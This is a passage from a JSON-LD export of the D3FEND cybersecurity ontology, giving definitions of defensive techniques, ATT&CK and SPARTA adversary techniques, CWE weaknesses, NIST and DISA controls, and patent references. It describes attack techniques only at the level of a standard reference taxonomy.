      "d3f:definition": "Numeric pattern matching uses a pattern specification and sees if the numeric value matches that pattern--simple forms include exact matching and range matching.",
      "rdfs:label": "Numeric Pattern Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PatternMatching"
      }
    },
    {
      "@id": "d3f:Session",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, in particular networking, a session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user (see Login session). A session is set up or established at a certain point in time, and then torn down at some later point. An established communication session may involve more than one message in each direction. A session is typically, but not always, stateful, meaning that at least one of the communicating parts needs to save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Session_(computer_science)"
      },
      "rdfs:label": "Session",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/session"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1444",
      "@type": "owl:Class",
      "d3f:attack-id": "T1444",
      "d3f:definition": "An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Masquerade as Legitimate Application - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Masquerade as Legitimate Application"
    },
    {
      "@id": "d3f:Reference-FrameworkForNotifyingADirectoryServiceOfAuthenticationEventsProcessedOutsideTheDirectoryService_OracleInternationalCorp",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20090077645A1"
      },
      "d3f:kb-abstract": "Methods, systems and machine-readable media for authenticating an end user for a client application are disclosed. According to one embodiment of the invention, a method of authenticating an end user for a client application using a directory service having an authentication control policy that tracks failed authentication attempts and allows lock out of an account after a predetermined number of failures comprises receiving end user identity information and security information at the client application; sending a search request to the directory service for an entry associated with the end user identity information and, if a match is found, receiving a authentication token from the directory service associated with the end user identity information; comparing the received authentication token with the security information; if the authentication token matches the security information, sending a request to update the directory service to indicate that successful authentication of the end user has occurred; and if the authentication token does not match the security information, sending a request to update the directory service to indicate that a failed attempt at authentication of the end user has occurred.",
      "d3f:kb-author": "Buddhika Nandana Kottahachchi",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Oracle International Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:kb-reference-title": "Framework for notifying a directory service of authentication events processed outside the directory service",
      "rdfs:label": "Reference - Framework for notifying a directory service of authentication events processed outside the directory service - Oracle International Corp"
    },
    {
      "@id": "d3f:T1624",
      "@type": "owl:Class",
      "d3f:attack-id": "T1624",
      "d3f:definition": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.",
      "rdfs:label": "Event Triggered Execution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Event Triggered Execution"
    },
    {
      "@id": "d3f:FileMetadataConsistencyValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileMetadataConsistencyValidation"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:FileContentBlockData"
        },
        {
          "@id": "d3f:FileMetadata"
        }
      ],
      "d3f:d3fend-id": "D3-FMCV",
      "d3f:definition": "The process of validating the consistency between a file's metadata and its actual content, ensuring that elements like declared lengths, pointers, and checksums accurately describe the file's content.",
      "d3f:kb-article": "## How it works\n\nThis technique involves validating the consistency between a file's metadata and its actual content. It checks elements like declared lengths, pointers, and checksums to ensure they accurately describe the file's content. For instance, if a header specifies a content block of 50 bytes, this should be verified, and CRC values should be recalculated and compared.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics"
      },
      "rdfs:label": "File Metadata Consistency Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileFormatVerification"
        },
        {
          "@id": "_:N655afa7f73324e1eb33f3a0ccbd7ca55"
        },
        {
          "@id": "_:N313d5c9b61e34889b4f7ff2da3759b86"
        }
      ]
    },
    {
      "@id": "_:N655afa7f73324e1eb33f3a0ccbd7ca55",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileContentBlockData"
      }
    },
    {
      "@id": "_:N313d5c9b61e34889b4f7ff2da3759b86",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:CWE-1390",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1390",
      "d3f:definition": "The product uses an authentication mechanism to restrict access to specific users or identities, but the mechanism does not sufficiently prove that the claimed identity is correct.",
      "rdfs:label": "Weak Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-287"
      }
    },
    {
      "@id": "d3f:VectorImageFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:VectorImage"
      },
      "d3f:definition": "A file that contains graphics data represented by vectors.",
      "rdfs:label": "Vector Image File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImageFile"
        },
        {
          "@id": "_:N70af7b40eff944ae8157e3d05f11e9dc"
        }
      ]
    },
    {
      "@id": "_:N70af7b40eff944ae8157e3d05f11e9dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VectorImage"
      }
    },
    {
      "@id": "d3f:BookReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Book",
      "rdfs:label": "Book Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:MotionDetector",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An electrical device that utilizes a sensor to detect nearby motion.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Motion_detector"
      },
      "rdfs:label": "Motion Detector",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Sensor"
        }
      ]
    },
    {
      "@id": "d3f:REC-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0007",
      "d3f:definition": "Adversaries watch for telltale signs that the spacecraft has entered a safed or survival configuration, typically sun-pointing or torque-limited attitude, reduced payload activity, conservative power/thermal setpoints, and low-rate engineering downlink. Indicators include specific mode bits or beacon fields, changes in modulation/coding and cadence, distinctive event packets (e.g., wheel unload aborts, brownout recovery), elevated heater duty, altered load-shed states, and operator behaviors such as emergency DSN requests, longer ground passes, or public anomaly notices. This reconnaissance helps time later actions to coincide with periods of reduced bandwidth, altered monitoring, or maintenance command availability. It may also reveal how safing affects authentication (e.g., whether rapid-response paths or recovery consoles differ from nominal).",
      "rdfs:label": "Monitor for Safe-Mode Indicators - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Monitor for Safe-Mode Indicators"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Audit Log Storage Capacity",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "AU-4"
    },
    {
      "@id": "d3f:Reference-SinkholingBadNetworkDomainsByRegisteringTheBadNetworkDomainsOnTheInternet_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160381065A1"
      },
      "d3f:kb-abstract": "Techniques for sinkholing bad network domains by registering the bad network domains on the Internet are provided. In some embodiments, sinkholing bad network domains by registering the bad network domains on the Internet includes determining a network domain is a bad network domain, in which the bad network domain is determined to be associated with an identified malware (e.g., malware that has been identified and has been determined to be associated with the bad domain), and the bad network domain is sinkholed by registering the bad network domain with a sinkholed IP address; and identifying a host that is infected with the identified malware based on an attempt by the host to connect to the sinkholed IP address.",
      "d3f:kb-author": "Huagang Xie; Wei Xu; Nir Zuk",
      "d3f:kb-mitre-analysis": "This patent describes a technique to identify bad domains that are associated with malware and sinkhole the bad domain. Bad domains are identified by receiving malware samples and executing the malware sample in a virtual execution environment to identify network domains that the malware sample attempts to connect to during execution. Network domains that are identified during malware execution are then generated into signatures to identity bad domains for other hosts. Once identified, the bad domains are sinkholed by translating the domain to a valid IP address that is associated with a device controlled by a cloud security provider.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Sinkholing bad network domains by registering the bad network domains on the internet",
      "rdfs:label": "Reference - Sinkholing bad network domains by registering the bad network domains on the internet - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:ScheduledJobAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ScheduledJobAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:JobSchedule"
      },
      "d3f:d3fend-id": "D3-SJA",
      "d3f:definition": "Analysis of source files, processes, destination files, or destination servers associated with a scheduled job to detect unauthorized use of job scheduling.",
      "d3f:kb-article": "## How it works\nScheduled job execution can be utilized by adversaries for the purpose of persistence, conducting remote execution, or gaining privileges. Details of a scheduled job such as associated source files, processes, destination files, or destination servers are first identified and analyzed and then compared against an anti-malware signature database, whitelist, or reputation server. For example, a file associated with a scheduled job to be executed at a specified time or a remote server that is accessed as part of a scheduled task is compared against an anti-malware signature database, whitelist, or reputation server, and if a match is found, execution is denied and an alert is generated.\n\nIn addition to traditional scheduled jobs, triggers can be set to execute a specific command after detecting a specific event in the system, such as with WMI Event Subscriptions in Windows.\n\n## Considerations\nJobs can be scheduled in many different and sometimes creative ways through operating system capabilities.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ExecutionWithAT_MITRE"
        },
        {
          "@id": "d3f:Reference-ExecutionWithSchtasks_MITRE"
        },
        {
          "@id": "d3f:Reference-PreventingExecutionOfTaskScheduledMalware_McAfeeLLC"
        }
      ],
      "d3f:synonym": "Scheduled Job Execution",
      "rdfs:label": "Scheduled Job Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N7b016c4554fe4eecafce461ed5b18f3e"
        }
      ]
    },
    {
      "@id": "_:N7b016c4554fe4eecafce461ed5b18f3e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "d3f:T1070",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070",
      "d3f:definition": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.",
      "rdfs:label": "Indicator Removal",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:WindowsNtAllocateVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtAllocateVirtualMemory routine reserves, commits, or both, a region of pages within the user-mode virtual address space of a specified process.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory"
      },
      "rdfs:label": "Windows NtAllocateVirtualMemory",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:RangeMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RM",
      "d3f:definition": "Numeric Range Matching determines if a value lies with an interval of values (i.e., within the range of values.)",
      "rdfs:label": "Range Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:NumericPatternMatching"
      }
    },
    {
      "@id": "d3f:T1053.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.001",
      "d3f:definition": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1053.002",
      "rdfs:label": "At (Linux) Execution",
      "rdfs:seeAlso": {
        "@id": "d3f:T1053.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_9",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:UserBehaviorAnalysis"
        }
      ],
      "d3f:control-name": "Least Privilege | Log Use of Privileged Functions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6(9)"
    },
    {
      "@id": "d3f:CCI-001067_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements privileged access authorization to organization-identified information system components for selected organization-defined vulnerability scanning activities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001067"
    },
    {
      "@id": "d3f:Process",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ProcessImage"
      },
      "d3f:definition": "A process is an instance of a computer program that is being executed. It contains the program code and its current activity. Depending on the operating system (OS), a process may be made up of multiple threads of execution that execute instructions concurrently. A computer program is a passive collection of instructions, while a process is the actual execution of those instructions. Several processes may be associated with the same program; for example, opening up several instances of the same program often means more than one process is being executed.",
      "d3f:instructed-by": {
        "@id": "d3f:Software"
      },
      "d3f:may-execute": {
        "@id": "d3f:Thread"
      },
      "d3f:process-image-path": {
        "@id": "d3f:ExecutableBinary"
      },
      "d3f:process-user": {
        "@id": "d3f:UserAccount"
      },
      "d3f:uses": {
        "@id": "d3f:Resource"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Process_(computing)"
      },
      "rdfs:label": "Process",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/process"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nc57908480533497fafe0a142ff3cf8f5"
        },
        {
          "@id": "_:N3b3a98eca8e94bf8acd63615db4987e6"
        },
        {
          "@id": "_:N71b5fbe283da4a4f94ec8ae5e5f00753"
        },
        {
          "@id": "_:N7a99f8068c3a4f8ebb83c7993d0bd325"
        },
        {
          "@id": "_:N698c881594e64b98a4e56d9ae43defb6"
        },
        {
          "@id": "_:N670ed86b3d614e1ebb9fd1c62506164f"
        },
        {
          "@id": "_:N25268f8e54c44e789c3987b8e3e218f7"
        },
        {
          "@id": "_:Na3c2b2a284404829b3b013999f65a6c7"
        },
        {
          "@id": "_:N0c262933ef6f49f09e33dd4b16073d88"
        },
        {
          "@id": "_:N87d3fdd0a5e5456b80c63de5ec8981fb"
        }
      ]
    },
    {
      "@id": "_:Nc57908480533497fafe0a142ff3cf8f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessImage"
      }
    },
    {
      "@id": "_:N3b3a98eca8e94bf8acd63615db4987e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:N71b5fbe283da4a4f94ec8ae5e5f00753",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-execute"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "_:N7a99f8068c3a4f8ebb83c7993d0bd325",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-image-path"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:N698c881594e64b98a4e56d9ae43defb6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-user"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N670ed86b3d614e1ebb9fd1c62506164f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "_:N25268f8e54c44e789c3987b8e3e218f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-command-line-arguments"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:Na3c2b2a284404829b3b013999f65a6c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-environmental-variables"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:N0c262933ef6f49f09e33dd4b16073d88",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-identifier"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:integer"
      }
    },
    {
      "@id": "_:N87d3fdd0a5e5456b80c63de5ec8981fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:process-security-context"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:SPARTAReconnaissanceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0001"
      },
      "rdfs:label": "Reconnaissance Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Nff1642aa34154d77b3f3dfdc22c77d82"
        }
      ],
      "skos:prefLabel": "Reconnaissance Technique"
    },
    {
      "@id": "_:Nff1642aa34154d77b3f3dfdc22c77d82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0001"
      }
    },
    {
      "@id": "d3f:IA-0001.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001.02",
      "d3f:definition": "Here the manipulation targets software delivered to flight or ground systems: altering source before build, swapping signed binaries at distribution edges, subverting update metadata, or using stolen signing keys to issue malicious patches. Space-specific vectors include mission control applications, schedulers, gateway services, flight tables and configuration packages, and firmware loads during I&T or LEOP. Adversaries craft payloads that pass superficial validation, trigger under particular operating modes, or reintroduce known weaknesses through version rollback. “Data payloads” such as malformed tables, ephemerides, or calibration products can double as exploits when parsers are permissive. The objective is to ride the normal promotion pipeline so the implant arrives pre-trusted and executes as part of routine operations.",
      "rdfs:label": "Software Supply Chain - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0001"
      },
      "skos:prefLabel": "Software Supply Chain"
    },
    {
      "@id": "d3f:CCI-002723_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, upon detection of a potential integrity violation, provides the capability to audit the event.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002723"
    },
    {
      "@id": "d3f:label",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "label"
      },
      "rdfs:subPropertyOf": {
        "@id": "rdfs:label"
      }
    },
    {
      "@id": "d3f:CWE-577",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-577",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using sockets.",
      "rdfs:label": "EJB Bad Practices: Use of Sockets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:Reference-Testing_Metrics_for_Password_Creation_Policies_by_Attacking_Large_Sets_of_Revealed_Passwords",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cs.umd.edu/~jkatz/security/downloads/passwords_revealed-weir.pdf"
      },
      "d3f:kb-author": "Matt Weir, Sudhir Aggarwal, Michael Collins, Henry Stern",
      "d3f:kb-reference-of": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:kb-reference-title": "Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords",
      "rdfs:label": "Reference - Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords"
    },
    {
      "@id": "d3f:Reference-PasswordandKeyRotation-SSH",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ssh.com/academy/iam/password-key-rotation"
      },
      "d3f:kb-organization": "SSH",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:CertificateRotation"
        },
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "d3f:PasswordRotation"
        }
      ],
      "d3f:kb-reference-title": "Password and Key Rotation",
      "rdfs:label": "Reference - Password and Key Rotation - SSH"
    },
    {
      "@id": "d3f:FullVolumeSnapshot",
      "@type": "owl:Class",
      "d3f:definition": "A full volume snapshot is a point-in-time copy of the complete contents of a volume.",
      "rdfs:label": "Full Volume Snapshot",
      "rdfs:seeAlso": {
        "@id": "https://aws.amazon.com/compare/the-difference-between-incremental-differential-and-other-backups/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:VolumeSnapshot"
      }
    },
    {
      "@id": "d3f:CWE-281",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-281",
      "d3f:definition": "The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.",
      "rdfs:label": "Improper Preservation of Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:OTDeviceDescriptionMessage",
      "@type": "owl:Class",
      "d3f:definition": "Describe features, abilities, or performance of system components.",
      "rdfs:comment": [
        "ENIP: List Services\nENIP: List Interfaces ",
        "GE-SRTP: RETURN CONTROL PROGRAM NAMES\nGE-SRTP: RETURN CONTROLLER TYPE AND ID INFORMATION"
      ],
      "rdfs:label": "OT Device Description Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:T1498.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1498.001",
      "d3f:creates": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "d3f:definition": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.",
      "rdfs:label": "Direct Network Flood",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1498"
        },
        {
          "@id": "_:Nbb728a4d25e14fc2b50d0b8e27ae402f"
        }
      ]
    },
    {
      "@id": "_:Nbb728a4d25e14fc2b50d0b8e27ae402f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:DomainUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A domain user account in Microsoft Windows (2000) defines that user's access to a logical group of network objects (computers, users, devices) that share the same Active Directory databases; that is, a user's access to a domain.",
      "rdfs:label": "Domain User Account",
      "rdfs:seeAlso": {
        "@id": "https://networkencyclopedia.com/global-user-account"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:EmbeddedComputer",
      "@type": "owl:Class",
      "d3f:definition": "An embedded computer is a computer system -- a combination of a computer processor, computer memory, and input/output peripheral devices -- that has a dedicated function within a larger mechanical or electrical system. It is embedded as part of a complete device often including electrical or electronic hardware and mechanical parts. Because an embedded system typically controls physical operations of the machine that it is embedded within, it often has real-time computing constraints. Embedded systems control many devices in common use today. Ninety-eight percent of all microprocessors manufactured are used in embedded systems.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Embedded_system"
      },
      "rdfs:label": "Embedded Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:ClientComputer"
      },
      "skos:altLabel": "Embedded System"
    },
    {
      "@id": "d3f:CCI-001150_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prohibits remote activation of collaborative computing devices, excluding the organization-defined exceptions where remote activation is to be allowed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001150"
    },
    {
      "@id": "d3f:D3FENDCore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "D3FEND Core"
    },
    {
      "@id": "d3f:impairs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x impairs y: The entity or action x hinders entity y by reducing its normal function, capacity, or availability.",
      "rdfs:label": "impairs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:SystemConfigurationInitResource",
      "@type": "owl:Class",
      "d3f:definition": "A system configuration initialization resource has information for initializing (booting) a system.",
      "rdfs:label": "System Configuration Init Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:LocalResource"
      },
      "skos:altLabel": "System Init Resource"
    },
    {
      "@id": "d3f:T1065",
      "@type": "owl:Class",
      "d3f:attack-id": "T1065",
      "d3f:definition": "Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1571",
      "rdfs:label": "Uncommonly Used Port",
      "rdfs:seeAlso": {
        "@id": "d3f:T1571"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:RegOpenKeyW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyW"
    },
    {
      "@id": "d3f:CCI-002460_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined actions prior to executing mobile code.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002460"
    },
    {
      "@id": "d3f:T1629.002",
      "@type": "owl:Class",
